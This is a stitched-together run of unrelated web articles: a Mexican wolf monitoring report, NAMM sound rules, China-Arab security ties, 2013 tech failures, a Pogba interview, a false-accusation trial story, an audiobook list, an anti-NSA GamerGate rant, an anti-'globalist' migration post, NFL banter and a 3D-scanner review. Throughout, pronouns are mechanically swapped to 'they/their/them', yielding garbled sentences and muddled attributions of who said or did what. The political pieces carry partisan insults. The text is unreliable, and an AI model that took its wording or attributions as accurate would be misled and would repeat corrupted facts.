Diamond Pack (collared m1447, f1557, mp1558, mp1559 and fp1560)In December, the Diamond Pack was located in the eastern portion of the FAIR, the northern portion of the ASNF and on private lands north of the ASNF. Sub-adult m1447 continued to be documented traveling with F1443, of the Bluestem Pack, in New Mexico near the Arizona border.
Tsay-O-Ah Pack (collared AM1343 and AF1283)In December, the Tsay-o-Ah Pack was located within their traditional territory in the eastern portion of the FAIR.
Baldy Pack (collared M1347 and f1445)In December, the Baldy Pack was located in the eastern portion of the FAIR and northern portion of the ASNF.
IN NEW MEXICO:
Dark Canyon Pack (collared AM992 and f1444) During December, the IFT located this pack within its traditional territory in the west central portion of the Gila National Forest (GNF). During December, f1444 was often located near Eagle Peak in NM.
Iron Creek Pack (collared AM1240, AF1278 and mp1556)During December, the Iron Creek Pack continued to utilize their territory in the northern portion of the Gila Wilderness and the southern portion of the GNF.
Lava Pack (collared F1405)During December, the IFT continued to document F1405 (formerly of the Buckalou Pack) traveling within the Lava Pack's traditional territory in the south eastern portion of the GNF.
Leopold Pack (collared AM1293 and mp1561)During December, the IFT documented the Leopold Pack within their territory in the northern portion of the Gila Wilderness and southern portion of the GNF.
Luna Pack (collared AF1487 and mp1554)During December, the Luna Pack remained in their traditional territory in the north central portion of the GNF.
Mangas Pack (collared M1296 and F1439)During December, the Mangas Pack was located within their territory in north western portions of the GNF in New Mexico.
Prieto Pack (collared M1386, m1455, f1456, M1552, f1553 and fp1565)During December, the Prieto Pack was located within their traditional territory in the north central portion of the GNF. There has been dispersal behavior documented for M1386, m1455, f1456, f1553 and M1552 within the GNF. Remote cameras documented f1553 and M1398 traveling with AF1251 and other uncollared wolves in the Prieto Pack. Photos from remote cameras taken later in the month revealed AF1251 traveling with M1398 and f1553 was traveling with AM1284 of the SBP Pack.
San Mateo Pack (collared AF1399)December, the IFT documented the San Mateo Pack within their territory in the north central portion of the GNF.
Sheepherders Baseball Park (SBP) Pack (collared AM1284)During December, the SBP Pack continued to use their traditional territory in the north central portion of the GNF. AM1284 was documented on remote cameras traveling with f1553 of the Prieto Pack.
Willow Springs Pack (collared F1397)During December, the IFT documented the Willow Springs Pack within their traditional territory in the north central portion of the GNF.
Single collared AM1155During December, AM1155 was documented traveling within New Mexico.
Single collared M1398 During December, M1398 was documented traveling with AF1251 of the Prieto Pack in the west central portion of the GNF.
Single collared M1354During December, M1354 was documented traveling in southern portions of the GNF and northern Gila Wilderness. M1354 has been documented traveling with members of the Leopold Pack; M1354 is full siblings to AM1293.
MORTALITIES
There were no documented mortalities in the month of December.
INCIDENTS
During the month of December, there was one confirmed wolf kill and no nuisance reports.
On December 14, Wildlife Services investigated two dead calves in Apache County, Arizona. The investigations determined both of the calves were killed by coyotes.
On December 18, Wildlife Services investigated a dead calf in Apache County, Arizona. The investigation determined the calf was a confirmed wolf kill.
On December 23, Wildlife Services investigated a dead adult cow in Apache County, Arizona. The investigation determined the cow died from unknown causes.
COMMUNICATION AND COORDINATION
On December 7, 2016, the Fish and Wildlife Service met with the New Mexico Department of Game and Fish and the Chairman of the New Mexico State Game Commission to discuss issues regarding the recovery of the Mexican wolf.
On December 8, 2016, the Fish and Wildlife Service convened a meeting of the Mexican Wolf Tribal Working Group to discuss the status of recovery planning for the Mexican wolf.
On December 14, 2016, the Fish and Wildlife Service presented on Mexican wolves and the Mexican Wolf Recovery program for the Superstition Area Land Trust in Apache Junction.
On December 14, 2016 WMAT met with the USDA-Farm Service Agency regarding livestock loss compensation options for Tribal cattle growers.
On December 15, 2016, the Fish and Wildlife Service held a community information meeting in Young, Arizona to discuss the status of the Mexican Wolf Recovery Program and listen to issues and concerns raised by the public. The US Forest Service and Arizona Game and Fish Department were in attendance.
On December 20, 2016 the Fish and Wildlife Service met with the US Forest Service regarding coordination of Mexican wolf recovery efforts, including the status of NEPA review for release sites in Zone 1 of the expanded Mexican Wolf Experimental Population Area.
On December 29, 2016 WMAT presented on Mexican wolf biology and recovery at a community event in Vermont.
PROJECT PERSONNEL
During December, USFWS volunteer Craig Zurek left the volunteer program for other professional opportunities. Thanks for all your hard work and dedication Craig!
REWARDS OFFERED
The USFWS is offering a reward of up to $10,000; the AGFD Operation Game Thief is offering a reward of up to $1,000; and the NMDGF is offering a reward of up to $1,000 for information leading to the conviction of the individual(s) responsible for the shooting deaths of Mexican wolves. A variety of non-governmental organizations and private individuals have pledged an additional $46,000 for a total reward amount of up to $58,000, depending on the information provided.
Individuals with information they believe may be helpful are urged to call one of the following agencies: USFWS special agents in Mesa, Arizona, at (480) 967-7900, in Alpine, Arizona, at (928) 339-4232, or in Albuquerque, New Mexico, at (505) 346-7828; the WMAT at (928) 338-1023 or (928) 338-4385; AGFD Operation Game Thief at (800) 352-0700; or NMDGF Operation Game Thief at (800) 432-4263. Killing a Mexican wolf is a violation of the Federal Endangered Species Act and can result in criminal penalties of up to $50,000, and/or not more than one year in jail, and/or a civil penalty of up to $25,000.
The organiser is taking steps to further improve sound control levels and enhance attendee and exhibitor experiences on the show floor at the next global gathering in Anaheim.
NAMM is looking to further improve sound control levels and enhance attendee and exhibitor experiences on the show floor at the next global gathering in Anaheim.
“We take sound levels very seriously at our shows,” says NAMM on its website. “Our goal is for every exhibitor, partner and attendee to have the most business-focused and positive experience possible. That's why at The 2018 NAMM Show, there are new ways we are reducing sound levels to enhance your experience.”
The trade show floor has been re-organised to maximise buyer time, with product segments now closer together. The tools and technology are being incorporated to reduce the sound of product demos, resulting in a better experience for all.
Special consideration has been given to all communities including grouping product categories together to optimise everyone's experience. Percussion will be in one area, string and bow in another, as well as sections of guitars, keyboards, pianos, pro audio, event technology and more. This will allow for targeted demo options, and will allow buyers to find their desired products faster.
NAMM will be adding additional sound patrol to distribute citations to those breaking sound rules. Demos are only permitted for up to five minutes for buyers and may not exceed a decibel level of 85. The NAMM Floor Management team tests sound levels throughout the day and will give verbal and written warnings. If necessary, NAMM will take action, including removing badges and closing booths for the remainder of the day or even shutting down a display for the duration of the show.
The organisers will also offer more demo rooms on the show floor for exhibitors to use throughout the show at no cost. In addition, NAMM has worked with Freeman to create cost-effective demo rooms available for rent in a booth, starting at $895. All demo rooms contain lighting, integrated ceiling, and installation/dismantling service with furniture, décor and air conditioning upgrades.
New this year, NAMM will be pioneering sound-buffering aisle signs and panels located throughout the show floor at the ACC and ACC North. Manufactured by the sound absorption specialists at GeerFab Acoustics, the design of the aisle signs features a two-inch thick fiberglass substrate wrapped in an acoustically transparent fabric that is custom printed with NAMM aisle sign graphics – two discrete graphics per sign. These custom-made signs are designed to help reduce sound levels across The NAMM Campus. In addition, thirty 48" x 96" MultiZorbers are being installed in each of the two Live Sound Demo Rooms.
NAMM exhibitors are able to use GeerFab's MultiZorber panels for their own booth signs or in the construction of their exhibit to contribute to the absorption of sound in the exhibit hall. Custom graphics and sound-blocking materials can be incorporated with sufficient lead time. If you are interested in using this technology, contact Joe Pestka with Freeman at joe.pestka@freeman.com to develop a sound-absorbing solution for your exhibit. To learn more about these products, visit http://www.geerfab.com/.
BEIJING (Reuters) - China wants to develop deeper defense and anti-terrorism ties with the Arab world, including joint exercises, intelligence sharing and training, the government said in a policy document released by the Foreign Ministry on Wednesday.
While relying on the region for oil supplies, China has tended to leave Middle Eastern diplomacy to the other five permanent members of the U.N. Security Council - the United States, Britain, France and Russia.
But China has been trying to get more diplomatically involved, especially in Syria, recently hosting both its foreign minister and opposition officials.
China also has its own worries about radicalization of the Muslim Uighur people who live in China's far western region of Xinjiang, which has been beset by violence in recent years, blamed by Beijing on Islamist militants.
In the lengthy document, released without prior warning, the foreign ministry called for more high-level military visits, technical cooperation on weaponry and joint exercises.
While China has sold weapons to Arab states, its ties with the region's militaries have traditionally been much more low-key than the United States, Britain or France.
“Continue to support military and defense construction with Arab countries, maintain regional peace,” the ministry said.
In December, China passed a counter-terrorism law which allows its military to venture overseas on counter-terrorism operations, though experts have said China faces big practical and diplomatic problems if it ever wants to do this.
China says some Uighurs have traveled to Syria and Iraq to fight with militant groups there.
In November, Islamic State said it had killed a Chinese citizen it had taken hostage in the Middle East.
“China is willing to deepen anti-terrorism exchanges and cooperation with Arab countries, set up a security cooperation mechanism effective over a long period, increase policy dialogue and intelligence exchanges, have technical exchanges and personnel training,” the ministry said.
This will allow China and Arab countries to “jointly face the threat from international and regional terrorism”, it added.
However, such moves must respect the charter of the United Nations and the sovereignty and territorial integrity of all countries, the ministry said, outlining the possible limits of any cooperation or Chinese military deployment.
The document also made a passing reference to religious exchanges.
China's ruling Communist Party may be officially atheist, but the country is home to more than 20 million Muslims, who are allowed to practise their religion with varying degrees of freedom.
There should be multilateral religious exchanges that stress tolerance and work together to root out extremism, the document said.
Story highlights In 2013, the HealthCare.gov website topped our list of tech 'fails'
Twitter Music was a rare misstep for the hot social platform
Yahoo's e-mail troubles irked users
The "year of the Web hoax" saw us believing in bunk
"Fail fast." It's a mantra you hear in the tech-startup world -- a reminder to chase your dreams even if you need to pick up the pieces and start from scratch every now and then.
Of course, some failures work out better than others.
This year saw its share of technology-driven missteps. Some were rare slip-ups by usually reliable tech titans. Others were folks who crashed the world stage via the Internet's powerful echo chamber, got lambasted for their efforts, then disappeared to presumably never be heard from again.
Among them all, it wasn't hard to fill the top spot on this year's list of "tech fails."
There are lots of arguments for and against the Affordable Care Act, President Barack Obama's signature health care law that has opened access to insurance for millions of Americans. But there's no debating that the rollout of its website , where millions of people would presumably sign up for care under the act, was a disaster.
JUST WATCHED Obamacare hearing dubbed 'monkey court' Replay More Videos ... MUST WATCH Obamacare hearing dubbed 'monkey court' 02:38
JUST WATCHED Zuckerberg explains Facebook Home Replay More Videos ... MUST WATCH Zuckerberg explains Facebook Home 02:37
JUST WATCHED These recent web hoaxes fooled the media Replay More Videos ... MUST WATCH These recent web hoaxes fooled the media 03:09
JUST WATCHED Smartwatch a smart idea? Replay More Videos ... MUST WATCH Smartwatch a smart idea? 02:39
Some painted it as a stark contrast between the nimble, flexible world of Silicon Valley startups and the unwieldy snarl of Washington bureacracy. Regardless, the glitch-filled launch gave critics of the plan plenty of ammunition at a time when supporters would have preferred to be extolling the virtues of the health care plan.
Of course, the full-time techies weren't perfect this year, either.
After unveiling its successful video app , Vine , Twitter launched an uncharacteristic clunker in Twitter Music , a streaming tool that nobody seemed to notice.
Once-mighty BlackBerry watched its dwindling relevance erode to almost zero in 2013, while Microsoft learned that taking on the iPad isn't easy as its Surface tablet struggled to find an audience.
Yahoo's tinkering with its e-mail service frustrated users -- although not as much as a handful of major outages. And Facebook learned that being the world's most popular social network doesn't mean people want a smartphone that's been reskinned with Facebook features.
Smartwatches were part of one o f the year's top tech stories , the emergence of wearable technology. But by the end of 2013, none of the devices had lived up to all the hype. Perhaps spoiled by the capabilities of their smartphones and tablets, many users felt the connected watches just don't do very much ... yet.
And it wouldn't be a year in the digital age without people using their Web access in regrettable, embarrassing and sometimes just plain stupid ways.
Be it overzealous crime-fighters on Reddit, restaurant owners ranting on Facebook or the rest of us leaping at the chance to believe, and share, phony stories , there were plenty instances of people posting first and thinking later.
Take a look at our Top 10 Tech Fails of 2013 and let us know in the comments if there are any you think we missed.
Manchester United found the perfect response to their critics last season by ending the campaign with three trophies, Paul Pogba told Esquire Magazine.
United were criticised for a lack of style during their first season under Jose Mourinho after struggling in front of goal, scoring just 54 times in the Premier League, 31 fewer than champions Chelsea.
But Pogba has insisted beautiful football means nothing without silverware. And United's haul of the Community Shield, EFL Cup and Europa League means they had a successful year.
"I accept that we didn't play well, we didn't do this, we didn't do that. I know what we did -- we won three trophies. That's all I know," Pogba said.
"And that's all that matters. Because you can be the best team in the world, you can play great football and you win zero trophies. And who remembers them? No one. Right?"
Pogba, who came up through United's academy, scored nine goals over 51 appearances in their first season back at Old Trafford following their record-breaking £89.3 million move from Juventus.
Paul Pogba says they forgot about their record-braking transfer fee after a week. Alex Broadway - The FA/The FA via Getty Images
The midfielder, though, insists they forgot the huge fee after just a week.
They added: "After one week, I forgot. It's people that reminded me. Because at the end of the day, when you die, the most expensive and the less expensive, they go in the same grave. So I don't even think about it."
A tough season for Pogba was made even more difficult when their father, Fassou Antoine, died in May aged 79 following a long-term illness.
Pogba said: "When you lose someone you love, you don't think the same way. And that's why I say I enjoy life, because it goes very fast. I remember when I was talking to my dad and now he's not here.
"My dad was a very strong man, very stubborn as well, they fought, but at their age it's not easy. No, they were a very good man, a very good dad and I'm proud to be their son.
"He was one of the funniest guys ever, so funny. Every time you had time with them you were laughing. Very clever as well, because they were a professor. You have to remember the happy things."
Pogba will begin preparing for their second season back at United when Mourinho's squad report back to Carrington next week.
This summer marks five years since they decided to quit Old Trafford for Juventus over a lack of playing time.
But the 24-year-old insists they always knew they would be back.
"I left Manchester to play. That's all I wanted. Even though I was young, I felt I could play now and I didn't want to wait," they said.
"So if it wasn't with Manchester it would be with someone else. But in my mind, I knew: 'It's not finished, I might come back.' My mum told me this: 'You'll come back one day.'"
Earlier on Thursday, Juventus coach Massimiliano Allegri lauded Pogba, but said they did not try to keep them at the Old Lady once they learned of Manchester United's historic offer.
"Pogba is extraordinary because they have physicality and technique," Allegri said in an interview with Sky. "I did nothing to keep Pogba, because when the club told me the numbers..."
Mr Pearson can be seen holding their bag and a newspaper
A commuter has spoken about the year-long trauma of being accused of sexually assaulting a woman despite there being no evidence to back up their claim whatsoever.
Mark Pearson, 51, was walking through Waterloo station – the busiest station in the UK – at rush hour and they brushed past an actor in December 2014.
They contacted police accusing Mr Pearson of penetrating them for two or three seconds following a violent blow to their left shoulder.
They tracked them down using data from their Oyster travel card at their home two months later when police turned up at their home.
Mr Pearson is under the red triangle, the woman is under the blue one
This is the moment the ‘two to three second sex assault' is supposed to have taken place
The allegation went so far that Mr Pearson was put on trial for three days before their name was cleared following what they told the Mail on Sunday was a ‘Kafkaesque nightmare'.
Advertisement
Advertisement
There are three stills from CCTV footage that show when they passed one another in a fleeting second, they were holding their bag in one hand and a newspaper in the other.
They told the court: ‘I would have had to crouch down, put my hand up the woman's skirt… penetrate her, take my hand out again… all while holding the newspaper and walking along the concourse… It's preposterous… It is against everything I believe in as a human being. I did nothing.'
There were no witnesses and no forensic evidence
Aside from that, the actor failed to pick them out in an ID parade, there were no witnesses and there was no forensic evidence.
The jury cleared their name after just 90 minutes of deliberation, but the effect on Mr Pearson has been dramatic.
‘For me, half a second turned into a year of hell. I feel I have undergone a form of mental torture sanctioned by the state.'
Mr Pearson has criticised the Crown Prosecution Service over the trial
In their summary, Judge Peter Clarke QC said the victim was very specific about an alleged shoulder barge, describing it in detail. However when they came to talk about the penetrative sex assault they seemed ‘coy'.
After the conclusion of the trial, Mr Pearson said the Crown Prosecution Service needs to use common sense.
The CPS said: ‘The CPS said: ‘There was sufficient evidence for this case to proceed to court and progress to trial. We respect the decision of the jury.'
Do you ever outgrow the pleasure of having a story read to you? Not if you're listening to these books. From A-list celebrities to talented voice actors with multiple pseudonyms, these voices will make you love literature, even if you're listening to it instead of reading it.
10) To Kill a Mockingbird, read by Sissy Spacek
The controversy over Harper Lee's new book has overshadowed the literary achievement of their original book. If you're looking to reconnect with the memory of that book, listening to Spacek's soft, slightly fragile voice narrating it is the perfect way to do it. Spacek's voice is plain, self-assured, and calm, and, unlike the voices of many narrators, manages a southern accent without sounding forced or ridiculous.
Advertisement
9) A Rage in Harlem, read by Samuel L. Jackson
Chester Himes is not as well known as Raymond Chandler, but should be. They were an award-winning hardboiled detective writer who had a style and a sense of humor—although not a comforting sense of humor. A Rage in Harlem is the first in a series of nine books that explore the methods of Harlem detectives Coffin Ed Johnson and Gravedigger Jones. Samuel L. Jackson has one of the most recognizable voices in the English-speaking world, and he's become America's Cool Dad, so hearing them read this story of doomed love, betrayal, con-artistry, and murder is bizarrely comforting. (If that's not your style, he's also the voice of God in The Bible Experience: New Testament.)
Advertisement
8) A Wizard of Earthsea, read by Karen Archer
Fantasy books are usually the domain of booming-voiced men, which makes Karen Archer's version of A Wizard of Earthsea so special. Them narration manages to make the story of young Ged growing into their power both epic and personal, something that we can all relate to. There are plenty of audiobook renditions of A Wizard of Earthsea, but this is the one that makes you feel like Ursula K. Le Guin themselves is reading it to you.
Advertisement
7) The Red Necklace, read by Tom Hiddleston
The Hids, as we call him, has done quite a few audiobooks, including a collection of James Bond stories and an audio version of J. G. Ballard's High Rise, which inspired the movie that Hiddleston is about to star in. For my money, though, I'd go with The Red Necklace, a story about various waifs and villains making their way through the French Revolution. Why? The villain. Hiddleston made their name in Hollywood playing the villain, so it's natural that the best part is the cartoonishly evil Count Kalliovski, who has people killed and leaves the eponymous “red necklace” of silk and garnets as their calling card.
6) Wolf Hall, read by Simon Slater
Audiobooks, especially older audiobooks, have been narrated by multiple people over the years. Most of the time it's possible to see the merits of each narrator; one has better comic timing, the other is able to distinguish the characters more easily, and a third has a more soothing tone. Other book narrators are like the voice of Kevin Conroy in Batman: The Animate Series—they ruin you for every other version.
Advertisement
While the second book in the Wolf Hall series was still being recorded, little thickets of consumer consternation sprang up about the fact that Simon Slater wasn't the narrator. He's that good! The prissy, theatrical voice of Cardinal Wolsey, the self-indulgent whining voice of Henry VIII, the pretentious, calculating, whip-smart voice of Anne Boleyn, and Thomas Cromwell's immovable deadpan; they're all in this performance. It won't just spoil you for listening to any other book—it will spoil you for reading the book instead of listening to it.
5) Perfume: The Story of a Murderer, read by Sean Barrett
Here is an audiobook so good that Roger Ebert couldn't resist mentioning it when they reviewed the movie. They wrote, “The audiobook, read by Sean Barrett, is the best audio performance I have ever heard; they snuffle and sniffles their way to greatness and you almost believe they are inhaling bliss, or the essence of a stone. I once almost destroyed a dinner party by putting it on for five minutes, after which nobody wanted to stop listening.” That may have been the most unkind review of any movie ever, since after that every single sentence they write about the movie is simply damning it with faint praise, but it's an accurate review of the book.
Advertisement
4) Slouching Towards Bethlehem, read by Diane Keaton
Here's a combination that shouldn't work. Keaton is known, at least on screen, for their warmth, liveliness, and good-nature. Joan Didion is known for their stylishly detached contempt. Sure, they both seem very intelligent, but in terms of manner they should never work together. And yet they do. This audiobook is the literary equivalent of putting sea salt on candy, it's stupid until you see how well it works, and then you understand why so many people try (usually unsuccessfully) to imitate it. Keaton warms the book up. Didion keeps Keaton's voice from sounding too much like a Nora Ephron hero, and the entire thing is enthralling.
Advertisement
3) Lolita, read by Jeremy Irons
Here's another star who narrated the audiobook and starred in a movie adaptation of the book. The audiobook is the far more successful, artistically, of the two. From the intentionally stuffy, pompous prologue to Humbert Humbert's wistful, lyrical description of “nymphets” to the dark horrible glimmers of reality we occasionally see through the narrator's screen of fantasy, the narration hooks us immediately.
Irons have done dramas and comedies, so they know how to work the book's absurd moments without making us laugh at the books tragic or repulsive moments.
Advertisement
2) The Proud Tower: A Portrait of the World Before the War, 1890-1914, read by Wanda McCaddon
The book, a look at the various social forces in play leading up to the First World War is not as dry as it sounds. It's beautiful and sad, as it gives us a tour of the end of an era—or rather, many eras at once. We look at the end of the Anarchists, half-crushed by repressive regimes, half-crushed by their own refusal to organize. We look at the end of the idealism of the socialists, who believed that once the working people recognized their international brotherhood they would never—could never—shoot each other. The book also gives us a confused pang of regret as we observe the downfall of the eccentric and brilliant patrician class in England, and the isolationist but liberty-loving American politicians.
And it's carried along by Wanda McCaddon, who also narrates under the names Nadia May and Donada Peters, and may add a hundred more aliases as long as they keep working. This is a superstar in the audiobook world, who started working in the 1980s and has done hundreds of audiobooks. Stumbling on even one of their books is like finding an actor or author entirely new to you but with a huge trove of work. You just feel lucky that you can keep getting their stuff. She's one of the masters of dialect and accent, able to give us everything from fussy French authors to Spanish anarchists to Russian intellectuals. More than that, this is one of those people whose voice everyone naturally turns towards at parties. How they manage to navigate regular life without people sitting at their feet is beyond me.
Advertisement
1) The Harry Potter Series, read by Stephen Fry
Well, for crying out loud, what did you expect? What else could top this list?
I was talking with two former io9 editors recently, neither could get into the Harry Potter series until they started listening to Stephen Fry's audiobook version. Because this isn't just a book that's brought to life by voice talent, it's a book that's meant to be read out loud. The alliterative names, the screwball situations, the rhymes and puzzles, are all a way for a narrator to play with and a listener to enjoy. The outsized characters, like Moaning Myrtle, are meant to be enacted for a person by a gifted actor. Unlucky kids will have to listen to their parents read to them. (The poor waifs.) Grown-up people, with money, can listen to a good actor engage with the material and give us the childhood experience we were meant to have.
If you've been reading me for decent length of time, you know that I used to write about politics. Nobody read it, but I still did it as a hobby. I also got a degree in political science. Basically, I've been a political junkie since the age of 15 or so, and even before then, I was pretty plugged in. I just loved politics. Recently, I've dropped out of the game. I finally understand all those people who told me they were too sickened to keep up with Washington. It's hard to watch now. Still, I'm not completely unplugged, and that brings us to today's column. This issue also relates to GamerGate, and all online activity, for that matter.
Rep. Justin Amash (R-Michigan) has been been highlighting a provision that the Senate Intelligence Committee appears to have snuck into the Intelligence Authorization Act in the middle of the night. It's pretty much a backdoor SOPA. It gives congressional authorization to some of the most controversial acts of the NSA, and does so through an amendment tacked on at the last minute. This is banana republic type stuff. Wikipedia explains (I know, fuck them) the executive order that the NSA wants Congress to codify:
“Executive Order 12333 has been regarded by the American intelligence community as a fundamental document authorizing the expansion of data collection activities. The document has been employed by the National Security Agency as legal authorization for its secret systematic collection of unencrypted information flowing through the data centers of internet communications giants Google and Yahoo.”
Here's the problem Amash, and others, have with the intelligence bill, also known as H.R. 4681:
“The objections from Amash and others arose from language in the bill's Section 309, which includes a phrase to allow for “the acquisition, retention, and dissemination” of U.S. phone and Internet data. That passage will give unprecedented statutory authority to allow for the surveillance of private communications that currently exists only under a decades-old presidential decree, known as Executive Order 12333.”
Just in case you think this a left vs right issue, let me let Democratic Rep. Zoe Lofgren have the floor:
“If this hadn't been snuck in, I doubt it would have passed,” said Rep. Zoe Lofgren, a California Democrat who voted against the bill. “A lot of members were not even aware that this new provision had been inserted last-minute. Had we been given an additional day, we may have stopped it.” Lofgren said they believed the Senate Intelligence Committee was the source of the language. The panel did not respond to requests for comment. Lofgren also said the language was “the exact opposite of what the House passed this summer.” They were referring to an amendment they championed that would have required the NSA to obtain a warrant before reading Americans' private messages that were collected through a program intended to target foreigners. “Congress is authorizing something very questionable constitutionally,” Lofgren added.”
So, the NSA has once again used scumbag senators like Dianne Feinstein to push their fascist vision through Congress. Don't let Feinstein fool you. Yea, they released the report on the CIA torture program. But she's still a tool of the establishment, lock, stock, and barrel. Oh, and did I mention the old hack also hates video games?
Here 's expounding on this idea some more, including directly referencing censorship by Congress. This woman is a toad, and I've known it for years. To be fair, they aren't the only one that went down this road. People like Lamar Alexander did as well. But they never mentioned censorship! Feinstein has been a consistent enemy of gamers for years, and has no problem with Congress stepping in:
“Feinstein also encouraged the entertainment and video game industries to take voluntary steps to produce products that do not glorify big, powerful guns before Congress feels compelled to step in. They mentioned that Adam Lanza, the 20-year-old man responsible for the Sandy Hook Elementary School slayings, practiced shooting both at a range with their mother and on a video screen. Video games play “a very negative role for young people, and the industry ought to take note of that,” they said. “If Sandy Hook doesn't do it, if the knowledge of these video games this young man played doesn't, then maybe we have to proceed, but that is in the future.”
This is the type of mind that props up NSA overreach. The Orwellian bastards should have been reigned in long ago, but we have a bunch of spineless cowards that serve as our elected officials. This provision has already been passed by both the House and Senate. The only hope to stop this, would be an veto of the Intelligence Authorization Act from President Obama. It's most likely a long shot, but then again, so was GamerGate. So was the American experiment. Sometimes, you have to play long odds.
Keep in mind, the communications they will now be statutorily enabled to intercept, includes multiplayer convos, and the like. This bleeds into everything. I really hope Obama steps to the plate on this one. They probably won't, but this could be a defining moment for him, and help restore some of the lost shine. The reason they lost that luster in the first place, was because they lacked conviction in areas like this, at least in my opinion. They ran on intelligence reform, but started sucking CIA and NSA ass as soon as they walked into 1600 Pennsylvania Avenue. If they were to step up now, they could shed a some of that.
Sign the petition, and contact the White House. Let them know that they will have popular support if they stand up. Tell them that you will put all other grudges behind you, to back President Obama on their veto. There is a cross-party coalition on these issues, we just need the leaders to quit being punks. The rank-and-file in both parties want the NSA reigned in. Not only is a veto the right choice, it's also the smart political choice.
Inspiration for #HR4681 push back. Network is one of the greatest movies ever, so watch it if u haven't. #GamerGate https://t.co/OndblCVfYC — Ethan Ralph (@TheRalphRetort) December 12, 2014
Liberals and globalists live in a bubble. Maintaining elitism requires little contact with people outside their echo-chamber. That truism is the primary foundation for their need of safe spaces etc. The inherent disconnect also becomes one of their greatest political weaknesses – if smart opposition knows how to use it. Trump is that smart opposition.
The Chatham Poll of EU Nations was so stunning to their ideological construct, it has penetrated the bubble. Globalists usually dispatch the rumors and whispers from neither-land occupants outside the bubble. However, when voices are quantified by a member of their own association, well, such realities are no longer easy dispatched.
Should All further migration from mainly Muslim countries be stopped?
German Voters: ♦ Agree 53% ♦ Disagree 19%
GERMANY – Angela Merkel will offer cash handouts worth millions of pounds for migrants to leave Germany in an effort to silence criticism of their ‘open-door' border policy. In a highly-embarrassing U-turn over the ill-fated plan, which saw 1.2million migrants flock to the country, Mrs Merkel has now vowed to send many of them home.
The German chancellor agreed a package of measures to speed up the deportation process for an estimated 450,000 migrants who have been rejected asylum. The controversial plan, which marks a significant toughening of previous proposals, includes a £76million scheme that will offer migrants cash incentives to leave Germany voluntarily. Many will see the move as a desperate attempt for Miss Merkel to claw back support ahead of their challenging re-election bid in September. (read more)
Advertisements
The New York Giants will head into Lambeau Field on Sunday with the second-best defense in points per game (17.8) when they take on the Green Bay Packers in the wild-card round of the NFC playoffs.
The secondary has been a big reason why the Giants defense has been so stout this season and have been dubbed the “NYPD” (New York Pass Defense), a moniker given to them by Newsday reporter Tom Rock.
Even though the Giants have one of the best secondaries in the NFL, the Packers wide receivers don't seem too impressed with their performances or their nickname.
“If that's what they call themselves, that's what they call themselves,” Geronimo Allison told ESPN. “There probably won't be too many handcuffs being passed out this Sunday.”
Allison wasn't the only wide receiver on the Packers offense that felt the nickname didn't measure up to the Giants secondary. Davante Adams feels that the jurisdiction doesn't cover Green Bay.
“Well we're in Wisconsin, so we don't have to worry about that,” Adams said to ESPN.
The Giants finished the season with the 23rd-ranked pass defense in the NFL, so at a quick glance, it does seem the nickname is a bit far-fetched.
However, the Giants have allowed the sixth-fewest yards per play and are tied for second in the NFL with 17 interceptions. Cornerback Dominique Rodgers-Cromartie has six, and safety Landon Collins has five.
Big Blue's defense has a tough test in front of them as the Aaron Rodgers-led Packers own the seventh-best passing offense in the NFL. Over their six-game winning streak to end the season, they threw 15 touchdowns and zero interceptions.
While the Packers should have a lot of confidence, given how their offense has played of late, the Giants secondary is no joke and should make for a strong matchup on both sides.
Last year, California-based Occipital closed out a wildly successful Kickstarter for its Structure Sensor, an iPad-mountable structured light scanner that can perceive the world in three dimensions by projecting infrared dots on things. The company is nearly done shipping the $399 devices to its crowdfunding backers (non-backers who buy one now can expect delivery in about a month), but we managed to finagle a couple of days with an early production version of the Structure Sensor to get a peek at how it performs in the real world. We learned a lot about what the Structure Sensor is—and we learned even more about what it isn't.
We received a pair of boxes from Occipital: one contained the Structure Sensor and its dedicated Lightning cable, and the other contained the bracket necessary to attach the Structure to our iPad mini (the Structure works with any iPad with a Lightning connector, but you need the correct bracket to mount it). The device itself feels agreeably solid—it's wrapped in an anodized aluminum housing with a glass front, through which are visible two infrared LEDs, the infrared structured light projector, and the infrared camera. It screws into the provided mounting bracket, then slips onto your iPad and is secured in place with a clamp. Once attached, you then connect a custom Lightning cable from the Structure to the iPad's port on its base. The entire assembly of sensor, bracket, and cable add about 124 grams of weight onto the back of the iPad.
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
The Structure, though, isn't so much a scanner as it is a platform. There are mobile and desktop apps you can use to make it work, but at least at this stage in the product's development those apps are still a bit sketchy. They function more than demonstrations of the scanner's potential uses than actual apps you'd want to use. The biggest draw about the Structure is its openness: the iOS SDK is available right now, which can be used to create Structure-compatible iOS apps immediately. Other platforms (Windows, OS X, and Android) will be getting open source drivers in the near future, though creating Structure apps for anything other than iOS will require the use of a special "hacker cable" to connect to the Structure.
A quick note before some reactions to the Structure: performing a full in-depth review of the scanner would mean dedicating time to actually exploring the SDK and creating a few apps; unfortunately, your humble reviews editor lacks the skill to walk fully down that path. As such, this is more of a quick hands on with the device.
Seeing through its eyes
The Structure unit we were provided with came with links to download a number of prerelease iOS apps with which to try out the scanner. The main "Structure" app shows what the Structure Sensor sees—it can provide you with a pure IR image from the sensor, a "depth" view showing the real-time interpretation of the structured light projection data from the sensor, and a "depth + color" view that combines the depth view with the image from the iPad's standard camera. The app also enables you to link the sensor via Wi-Fi to a desktop application like Skanect and scan directly to a computer instead of to the iPad. The IR-only mode also lets you toggle on the two bright infrared LEDs, thus giving your iPad a "night vision" mode similar to that on some consumer camcorders.
On our test second-generation iPad mini (the retina model), the output from the scanner in the main Structure app was snappy and low-lag. Occipital's marketing materials claim that the scanner can generate a "VGA depth stream" at 30 fps, and that jives with what we observed on the iPad's screen.
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
How it works
This isn't the first time Ars has gotten some hands-on time with structured light scanning. Previously, we got to fiddle around with a much larger-scale structured light scanning operation at NASA's Marshall Space Flight Center in Huntsville, Alabama, where engineers were using large mobile structured light scanning rigs to visualize massive Rocketdyne F-1 rocket engines of the same type that powered Saturn V rockets off of the pad in the 1960s and '70s.
The principles are mostly the same with the Structure Sensor. The Structure projects a unique infrared pattern of dots out in front of it, and the infrared camera uses that pattern of dots to visualize the shape and distance of objects. The projection is done with a dedicated infrared laser projector (the two bright infrared LCDs on the scanner aren't used for 3D scanning). This type of structured light projection and detection is also what Microsoft's Kinect sensors used to work.
